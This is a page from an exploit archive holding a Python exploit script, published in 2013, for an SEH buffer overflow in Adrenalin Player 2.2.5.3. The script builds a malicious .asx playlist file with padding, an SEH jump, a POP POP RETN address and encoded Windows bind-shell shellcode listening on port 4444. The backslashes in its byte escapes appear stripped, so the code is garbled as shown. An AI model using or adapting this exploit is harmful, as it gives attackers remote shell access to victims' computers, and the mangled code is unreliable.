Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adrenalin Player 2.2.5.3 (.asx) - SEH Buffer Overflow
# Published : 2013-06-21
# Author :
# Previous Title : AudioCoder 0.8.22 (.lst) - Direct Retn Buffer Overflow
# Next Title : ERS Viewer 2013 ERS File Handling Buffer Overflow

# ======================================================================================#
# !/usr/bin/python									#
# Title:                Adrenalin Player (.asx) - SEH Buffer Overflow 			#
# software: 		Adrenalin Player						#
# version : 		2.2.5.3								#
# Platform:             Windows XP sp3							#
# Date:                 June 18th, 2013							#
# Author:               onying (@onyiing)						#
# Blog :		http://itsecuritynewbie.blogspot.com/ 				#
# Thanks to:            Information Security Shinobi Camp | http://www.is2c-dojo.com 	#
# ======================================================================================#
header="<asx version = 3.0 > "
junk= "x90" * 2079
junk+="xebx06x90x90" #jmp short
junk+="x13xf3x16x10" #POP POP RETN AdrenalinX.dll
junk+="x90" * 16 # NOP padding before shellcode

#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("xbbx25xaaxd2xa3x2bxc9xdaxd6xd9x74x24xf4x5exb1x51"
"x31x5ex10x83xeexfcx03x7bxa6x30x56x7fxdcx5fxd4x97"
"xd8x5fx18x98x7bx2bx8bx42x58xa0x11xb6x2bxcax9cxbe"
"x2axdcx14x71x35xa9x74xadx44x46xc3x26x72x13xd5xd6"
"x4axe3x4fx8ax29x23x1bxd5xf0x6exe9xd8x30x85x06xe1"
"xe0x7excfx60xecxf4x50xaexefxe1x09x25xe3xbex5ex66"
"xe0x41x8ax9bx34xc9xc5xf7x60xd1xb4xc4x58x32x52x41"
"xd9xf4x10x15xd2x7fx56x89x47xf4xd7xb9xc9x63x56xf7"
"xfbx9fx36xf8xd2x06xe4x60xb3xf5x38x04x34x89x0ex8b"
"xeex92xbfx5bxc4x80xbcxa0x8axa5xebx89xa3xbfx72xb4"
"x59x37x79xe3xcbx4ax82xdbx64x92x75x2exd9x73x79x06"
"x71x2fxd6xf5x25x8cx8bxbax9axedxfcx5ax75x03xa1xc4"
"xd6xaaxb8x9dxb1x08x20xedx86x06xaaxdbx63xb9x05xb6"
"x8cx69xcdx9cxdexa4xe7x8bxdfx6fxa4x66xdfx40x23x6d"
"x56xe7xfdx3ax96x31xadx90x3cxebxb1xc8x2ex7bxa9x91"
"x96x05x62x9exc1xa3x73xb0x88x21xe8x56x3dxd5x9dx1f"
"x58x73x0ex46x8ax48x27x9fxa6x14xb1xbdx06x55x32xeb"
"x97x17x98x15x25xb4x71x64xd0xfcxdexddx8ex95x52xdf"
"x62x73x6cx6axc1x83x44xcfx9ex29x38xbex71xa4xbbx11"
"x23x6dxedx6ex13xe5xa0x49x91x38xe9x96x4cxaexf1x97"
"x46xd0xdexecxfexd2x5cx36x64xd4xb5xe4x9axfax52x76"
"xbdx19xd1xd5xc2x08xe9x09")
junk+= "x90" * (3000-len(junk))
footer="</asx>"
file = open("adrenalin.asx","w")
file.write(header+junk+footer)
file.close()